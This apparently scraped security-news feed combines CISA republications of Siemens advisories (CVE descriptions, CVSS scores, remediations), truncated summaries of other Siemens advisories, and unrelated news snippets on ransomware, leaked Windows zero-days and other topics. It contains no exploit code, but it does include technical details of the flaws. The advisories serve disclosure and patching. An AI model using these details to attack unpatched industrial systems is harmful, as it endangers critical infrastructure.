Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-400 Uncontrolled Resource Consumption Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-21947 Vulnerability in Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u471-b50. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N). View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.1 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N CVE-2026-22924 The affected application does not properly restrict unauthenticated connections and is susceptible to resource exhaustion conditions. This could allow an attacker to disrupt normal operations or perform unauthorized actions, potentially impacting system availability and integrity. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H CVE-2026-22925 The affected application is susceptible to resource exhaustion when subjected to high volume of TCP SYN packets This could allow an attacker to render the service unavailable and cause denial-of-service conditions by overwhelming system resources. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-770 Allocation of Resources Without Limits or Throttling Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-28387 Issue summary: An uncommon configuration of clients performing DANE TLSA-based server authentication, when paired with uncommon server DANE TLSA records, may result in a use-after-free and/or double-free on the client side. Impact summary: A use after free can have a range of potential consequences such as the corruption of valid data, crashes or execution of arbitrary code. However, the issue only affects clients that make use of TLSA records with both the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate usage. By far the most common deployment of DANE is in SMTP MTAs for which RFC7672 recommends that clients treat as 'unusable' any TLSA records that have the PKIX certificate usages. These SMTP (or other similar) clients are not vulnerable to this issue. Conversely, any clients that support only the PKIX usages, and ignore the DANE-TA(2) usage are also not vulnerable. The client would also need to be communicating with a server that publishes a TLSA RRset with both types of TLSA records. No FIPS modules are affected by this issue, the problem code is outside the FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-416 Use After Free Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2026-28388 Issue summary: When a delta CRL that contains a Delta CRL Indicator extension is processed a NULL pointer dereference might happen if the required CRL Number extension is missing. Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application. When CRL processing and delta CRL processing is enabled during X.509 certificate verification, the delta CRL processing does not check whether the CRL Number extension is NULL before dereferencing it. When a malformed delta CRL file is being processed, this parameter can be NULL, causing a NULL pointer dereference. Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in the verification context, the certificate being verified to contain a freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and an attacker to provide a malformed CRL to an application that processes it. The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-28389 Issue summary: During processing of a crafted CMS EnvelopedData message with KeyAgreeRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-28390 Issue summary: During processing of a crafted CMS EnvelopedData message with KeyTransportRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with RSA-OAEP encryption is processed, the optional parameters field of RSA-OAEP SourceFunc algorithm identifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-476 NULL Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2026-31789 Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. Impact summary: A heap buffer overflow may lead to a crash or possibly an attacker controlled code execution or other undefined behavior. If an attacker can supply a crafted X.509 certificate with an excessively large OCTET STRING value in extensions such as the Subject Key Identifier (SKID) or Authority Key Identifier (AKID) which are being converted to hex, the size of the buffer needed for the result is calculated as multiplication of the input length by 3. On 32 bit platforms, this multiplication may overflow resulting in the allocation of a smaller buffer and a heap buffer overflow. Applications and services that print or log contents of untrusted X.509 certificates are vulnerable to this issue. As the certificates would have to have sizes of over 1 Gigabyte, printing or logging such certificates is a fairly unlikely operation and only 32 bit platforms are affected, this issue was assigned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 7 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H CVE-2026-31790 Issue summary: Applications using RSASVE key encapsulation to establish a secret encryption key can send contents of an uninitialized memory buffer to a malicious peer. Impact summary: The uninitialized buffer might contain sensitive data from the previous execution of the application process which leads to sensitive data leakage to an attacker. RSA_public_encrypt() returns the number of bytes written on success and -1 on error. The affected code tests only whether the return value is non-zero. As a result, if RSA encryption fails, encapsulation can still return success to the caller, set the output lengths, and leave the caller to use the contents of the ciphertext buffer as if a valid KEM ciphertext had been produced. If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid RSA public key without first validating that key, then this may cause stale or uninitialized contents of the caller-provided ciphertext buffer to be disclosed to the attacker in place of the KEM ciphertext. As a workaround calling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate the issue. The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue. View CVE Details Affected Products Siemens SIMATIC Vendor:Siemens Product Version:SIMATIC CN 4100 Product Status:known_affected Remediations Vendor fixUpdate to V5.0 or later versionhttps://support.industry.siemens.com/cs/ww/en/view/109814144/ Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Acknowledgments Siemens ProductCERT reported these vulnerabilities to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-032379 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-032379 advisory Legal Notice and Terms of Use

View CSAF Summary Ruggedcom Rox contains an input validation vulnerability in the Scheduler functionality that could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/

View CSAF Summary Ruggedcom Rox before v2.17.1 contain multiple third-party vulnerabilities. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/

View CSAF Summary Simcenter Femap is affected by heap based buffer overflow vulnerability in Datakit library that could be triggered when the application reads files in IPT format. If a user is tricked to open a malicious file with the affected application, an attacker could leverage the vulnerability to perform remote code execution in the context of the current process. Siemens has released a new version for Simcenter Femap and recommends to update to the latest version. The following versions of Siemens Simcenter Femap are affected: Simcenter Femap vers:intdot/

View CSAF Summary Successful exploitation of these vulnerabilities could allow an attacker to bypass authentication and execute code. The following versions of Universal Robots Polyscope 5 are affected: Polyscope 5

View CSAF Summary Ruggedcom Rox contains an input validation vulnerability in the feature key installation process that could allow an authenticated remote attacker to execute arbitrary commands with root privileges on the underlying operating system. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/

View CSAF Summary Siemens Teamcenter is affected by multiple vulnerabilities which could potentially lead to a compromise in availability, integrity and confidentiality. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Teamcenter are affected: Teamcenter V2312 vers:intdot/

View CSAF Summary Solid Edge SE2026 before Update 5 is affected by two file parsing vulnerabilities that could be triggered when the application reads specially crafted files in PAR format. This could allow an attacker to crash the application or execute arbitrary code. Siemens has released a new version for Solid Edge SE2026 and recommends to update to the latest version. The following versions of Siemens Solid Edge are affected: Solid Edge vers:intdot/

View CSAF Summary The web server in SENTRON 7KT PAC1261 Data Manager Before V2.1.0 contains a request smuggling vulnerability in the Go Project's net/http package that could allow an attacker to retrieve authorization tokens that can be used to gain administrative control over the device. Siemens has released a new version for SENTRON 7KT PAC1261 Data Manager and recommends to update to the latest version. The following versions of Siemens SENTRON 7KT PAC1261 Data Manager are affected: SENTRON 7KT PAC1261 Data Manager vers:intdot/

View CSAF Summary Opcenter RDnL is affected by missing authentication in critical function in ‘ActiveMQ Artemis’. An unauthenticated attacker within the adjacent network could use the Core protocol to force a target broker to establish an outbound Core federation connection to an attacker-controlled rogue broker. This could potentially result in availability impacts or message injection into any queue via the rogue broker. Breaking the integrity of a message has a low impact due to missing auto refresh functionality and it does not contain any confidential information. ActiveMQ Artemis has released a new version and Siemens recommends to update to the latest version. The following versions of Siemens Opcenter RDnL are affected: Opcenter RDnL vers:all/* CVSS Vendor Equipment Vulnerabilities v3 7.1 Siemens Siemens Opcenter RDnL Missing Authentication for Critical Function Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-27446 Missing Authentication for Critical Function (CWE-306) vulnerability in Apache Artemis, Apache ActiveMQ Artemis. An unauthenticated remote attacker can use the Core protocol to force a target broker to establish an outbound Core federation connection to an attacker-controlled rogue broker. This could potentially result in message injection into any queue and/or message exfiltration from any queue via the rogue broker. This impacts environments that allow both: - incoming Core protocol connections from untrusted sources to the broker - outgoing Core protocol connections from the broker to untrusted targets View CVE Details Affected Products Siemens Opcenter RDnL Vendor:Siemens Product Version:Opcenter RDnL Product Status:known_affected Remediations MitigationImplement and deploy a Core interceptor to deny all Core downstream federation connect packets. Such packets have a type of (int) -16 or (byte) 0xfffffff0. Documentation for interceptors is available at https://artemis.apache.org/components/artemis/documentation/latest/intercepting-operations.html . MitigationRemove Core protocol support from any acceptor receiving connections from untrusted sources. Incoming Core protocol connections are supported by default via the "artemis" acceptor listening on port 61616. See the "protocols" URL parameter configured for the acceptor. An acceptor URL without this parameter supports all protocols by default, including Core MitigationUse two-way SSL (i.e. certificate-based authentication) in order to force every client to present the proper SSL certificate when establishing a connection before any message protocol handshake is attempted. This will prevent unauthenticated exploitation of this vulnerability Vendor fixUpdate to Apache Artemis version 2.52.0 or later version Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-085541 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-05-12 Date Revision Summary 2026-05-12 1 Publication Date 2026-05-14 2 Initial CISA Republication of Siemens ProductCERT SSA-085541 advisory Legal Notice and Terms of Use

View CSAF Summary Ruggedcom Rox contains an improper access control vulnerability that could allow an authenticated remote attacker to read arbitrary files with root privileges from the underlying operating system's filesystem. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Ruggedcom Rox are affected: RUGGEDCOM ROX MX5000 vers:intdot/

View CSAF Summary SIMATIC S7 PLCs contain multiple vulnerabilities in the web server that could allow an attacker to perform cross-site scripting attacks. Siemens has released new versions for several affected products and recommends to update to the latest versions. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet available. The following versions of Siemens SIMATIC S7 PLC Web Server are affected: SIMATIC Drive Controller CPU 1504D TF (6ES7615-4DF10-0AB0) vers:intdot/

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-20182 Cisco Catalyst SD-WAN Controller Authentication Bypass Vulnerability This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise. Note: Please adhere to CISA’s guidelines to assess exposure and mitigate risks associated with Cisco SD-WAN devices as outlined in Emergency Directive 26-03: Mitigate Vulnerabilities in Cisco SD-WAN Systems and Supplemental Direction ED 26-03: Hunt and Hardening Guidance for Cisco SD-WAN Systems. Adhere to the applicable Binding Operational Directive (BOD) 22-01 guidance for cloud services or discontinue use of the product if mitigations are not available. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.

View CSAF Summary SIMATIC HMI Unified Comfort Panels before V21.0 are affected by a vulnerability that allows an unauthenticated attacker to access the web browser via the help link. This vulnerability allows an attacker to access the web browser through the Control Panel if it is not protected by the corresponding security mechanisms. This opens the possibility for the attacker to find backdoors, which might lead to unwanted misconfigurations. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens SIMATIC are affected: SIMATIC HMI MTP1000 Unified Comfort Panel (6AV2128-3KB06-0AX1) vers:intdot/

View CSAF Summary The SIPROTEC 5 devices do not use sufficiently random numbers to generate session identifiers. This could facilitate a brute-force attack against a valid session identifier which could allow an unauthenticated remote attacker to hijack a valid user session. The affected session identifiers are only used in a subset of the endpoints that are provided by the affected products. Siemens is preparing fix versions and recommends countermeasures for products where fixes are not, or not yet available. The following versions of Siemens SIPROTEC 5 are affected: SIPROTEC 5 6MD84 (CP300) vers:intdot/=7.80|=7.80|=7.80|=7.80|=7.80|=7.80 (CVE-2024-54017) SIPROTEC 5 7SA82 (CP150) vers:intdot/=7.80|=7.80|=7.80 (CVE-2024-54017) SIPROTEC 5 7SD82 (CP150) vers:intdot/=7.80|=7.80|=7.80 (CVE-2024-54017) SIPROTEC 5 7SJ81 (CP150) vers:intdot/=7.80 (CVE-2024-54017) SIPROTEC 5 7SJ82 (CP150) vers:intdot/=7.80|=7.80|=7.80 (CVE-2024-54017) SIPROTEC 5 7SK82 (CP150) vers:intdot/=7.80|=7.80 (CVE-2024-54017) SIPROTEC 5 7SL82 (CP150) vers:intdot/=7.80|=7.80|=7.80|=7.80|

View CSAF Summary Multiple industrial devices contain a vulnerability that could allow an attacker to cause a denial of service condition. Siemens has released new versions for several affected products and recommends to update to the latest versions. Siemens is preparing further fix versions and recommends specific countermeasures for products where fixes are not, or not yet available. The following versions of Siemens Industrial Devices are affected: IE/PB LINK HA (6GK1411-5BB00) vers:all/* (CVE-2025-40833) IE/PB link PN IO (6GK1411-5AB10) vers:all/* (CVE-2025-40833) RUGGEDCOM RM1224 LTE(4G) EU (6GK6108-4AM00-2BA2) vers:intdot/

A Nitrogen ransomware attack on Foxconn's North American facilities is one of 600 hits on manufacturers this year, as gangs increasingly target the sector for its low tolerance for downtime.

SpaceX and Blue Origin may yet get a role in low Earth orbit rehearsal, readiness permitting

N/A

Former Power Minister Saleh Mamman was convicted last week - but the authorities do not know his whereabouts.

As the US delegation met with their Chinese counterparts in Beijing, some hugely important topics were on the agenda. However, US Secretary of State Marco Rubio also found the time to admire the meeting room’s interior design. Footage of Rubio checking out the ceiling of one of the grand reception rooms in which President Xi Jinping hosted his US counterpart Donald Trump on Thursday went viral online. The candid footage catches Rubio in the East Hall of the Great Hall of the People in Beijing,...

Threat actors have been observed attempting to exploit a recently disclosed security vulnerability in PraisonAI, an open-source multi-agent orchestration framework, within four hours of public disclosure. The vulnerability in question is CVE-2026-44338 (CVSS score: 7.3), a case of missing authentication that exposes sensitive endpoints to anyone, potentially allowing an attacker to invoke the

Tuff match slutade med seger för Vårgårda mot Trollhättan Syr Alingsås Tidning

In working toward the stable Plasma 6.7 desktop release in mid-June, out today is the first beta of KDE Plasma 6.7...

AI hallucinations are introducing serious security risks into critical infrastructure decision-making by exploiting human trust through highly confident yet incorrect outputs. When an AI model lacks certainty, it doesn’t have a mechanism to recognize that. Instead, it generates the most probable response based on patterns in its training data, even if that response is inaccurate. These outputs

Apple's interest in expanding its Formula 1 streaming deal for Apple TV beyond the United States may have stalled, after Sky Sports signed early renewals to retain the sport's broadcast rights across its largest European markets. Sky and F1 jointly announced on May 6 that Sky will remain F1's exclusive live broadcast partner in the UK and Ireland through the 2034 season, and in Italy through 2032. The five-year extension adds to a UK and Ireland deal that was already running through 2029, so it won't impact any immediate plans Apple may have had, but it certainly pushes those markets further out of reach. Sky's early move secured the rights before they could go to open tender. Sky and F1 did not disclose the value of the deal, but trade publication IBC reported that the UK and Ireland portion is worth around £200 million (around $265–270 million) per season, while other reports put the total figure at around £1 billion (around $1.34 billion). The deal follows recent comments from Apple's senior vice president of services Eddy Cue at the Autosport Business Exchange in Miami. According to a report from MotorBiscuit, Cue said that clinching its F1 streaming rights in the U.S. first was "undoubtedly the best strategy," adding: "I hope we can expand into other markets." Sky may have walled off the British, Irish, and Italian markets for now, but other major European deals remain open – Canal Plus holds French rights only through 2029, for example. Apple's five-year U.S. deal began with the 2026 season, and Apple has already folded its coverage into its wider offerings, with a dedicated F1 section in the Apple TV app, race tracking in Apple Sports, F1 circuit guides in Apple Maps, and playlists in Apple Music. Tag: EuropeThis article, "Apple's F1 Streaming Ambitions Hit Wall as Sky Renews European Rights" first appeared on MacRumors.comDiscuss this article in our forums

We have email accounts hosted on a commercial provider's server. Today, we accidentally discovered that some accounts are returning delivery failure notices from gmail.com due to attachment size limits. After logging into the webmail interface, we found a redirect rule named "." (dot) that had been added to these accounts. This rule is designed to forward all incoming emails from the corporate address to a specific Gmail account. None of our users added these rules. If this were happening at the local computer level, it would be one thing, but this is happening directly on the provider's server. Is it possible for such a rule to be created from a mail client (like Outlook or Thunderbird) just by clicking something? The provider insists that this must have been caused by our own actions. submitted by /u/kolo81 [link] [comments]

Owe Martin Andresen faces charges in both US and Germany connected with money laundering, claims he sent gold bars directly to his doorstep

Founded in 1944 and headquartered in Woonsocket, Rhode Island, Technic Inc. is an international supplier of electroplating chemicals and equipment.

Goldberg Coins & Collectibles Inc. is a family-owned business specializing in numismatic auctions and collectibles, with a legacy dating back to 1930. The company offers expert auction services, personal consultations, and has a strong reputation for achieving record-breaking prices for consignors. Their intended clients include coin collectors and investors looking to sell or acquire high-quality numismatic items. With over 80 years of combined experience, Ira and Larry Goldberg provide a professional and personalized service, ensuring client satisfaction and exceptional results.

The goal of the guidance, which outlines minimum elements, is to help organizations enhance transparency in AI systems and supply chains. The post G7 Countries Release AI SBOM Guidance appeared first on SecurityWeek.

Rådjur på fel sida av viltstängslet på E20 Alingsås Tidning

Last month, Anthropic made a remarkable announcement about its new model, Claude Mythos Preview: it was so good at finding security vulnerabilities in software that the company would not release it to the general public. Instead, it would only be available to a select group of companies to scan and fix their own software. The announcement requires context—but it contained an essential truth. While Anthropic’s model is really good at finding software vulnerabilities, so are other models. The UK’s AI Security Institute found that OpenAI’s GPT-5.5, already generally available, is comparable in capability. The company Aisle ...

Doctors welcome joined-up care plan, but warn patient trust depends on safeguards, access controls, and knowing where Palantir fits in

Xi meeting may force Trump to pivot on chip restrictions and Taiwan.

An anonymous researcher known as Nightmare-Eclipse, who has already leaked several Windows zero-days this year, has disclosed two more: YellowKey and GreenPlasma. The Register reports: Nightmare-Eclipse described YellowKey as "one of the most insane discoveries I ever found." They provided the files, which have to be loaded onto a USB drive, and if the attacker completes the key sequence correctly, they are granted unrestricted shell access to a BitLocker-protected machine. When it comes to claims like these, we usually exercise some caution, as this bug requires physical access to a Windows PC. However, seeing that BitLocker acts as Windows' last line of defense for stolen devices, bypassing the technology grants thieves the ability to access encrypted files. Rik Ferguson, VP of security intelligence at Forescout, said: "If [the researcher's claim] holds up, a stolen laptop stops being a hardware problem and becomes a breach notification." Despite the physical access requirement, Gavin Knapp, cyber threat intelligence principal lead at Bridewell, told The Register that YellowKey remains "a huge security problem for organizations using BitLocker." Citing information shared in cyber threat intelligence circles, he added that YellowKey can be mitigated by implementing a BitLocker PIN and a BIOS password lock. Nightmare-Eclipse hinted at YellowKey also acting as a backdoor, allegedly injected by Microsoft, although the people we spoke to said this was impossible to verify based on the information available. The researcher also published partial exploit code for GreenPlasma, rather than a fully formed proof of concept exploit (PoC). Ferguson noted attackers need to take the code provided by the researcher and figure out how to weaponize it themselves, which is no small task: in its current state it triggers a UAC consent prompt in default Windows configurations, meaning a silent exploit remains a work in progress. Knapp warned that these kinds of privilege escalation flaws are often used by attackers after they gain an initial foothold in a victim's system. "These elevation of privilege vulnerabilities are often weaponized during post-exploitation to enable threat actors to discover and harvest credentials and data, before moving laterally to other systems, prior to end goals such as data theft and/or ransomware deployment," he said. "Currently, there is no known mitigation for GreenPlasma. It will be important to patch when Microsoft addresses the issue." The other zero-days leaked include RedSun, a Windows Defender privilege escalation flaw; UnDefend, a Windows Defender denial-of-service bug; and BlueHammer, a separate Microsoft vulnerability tracked as CVE-2026-32201 that was patched in April. According to The Register, RedSun and UnDefend remained unfixed at the time of publication, and proof-of-concept code for the flaws was reportedly picked up quickly and abused in real-world attacks. Read more of this story at Slashdot.

Drones bound for Russia crashed down in Latvia last week, prompting a political fallout.

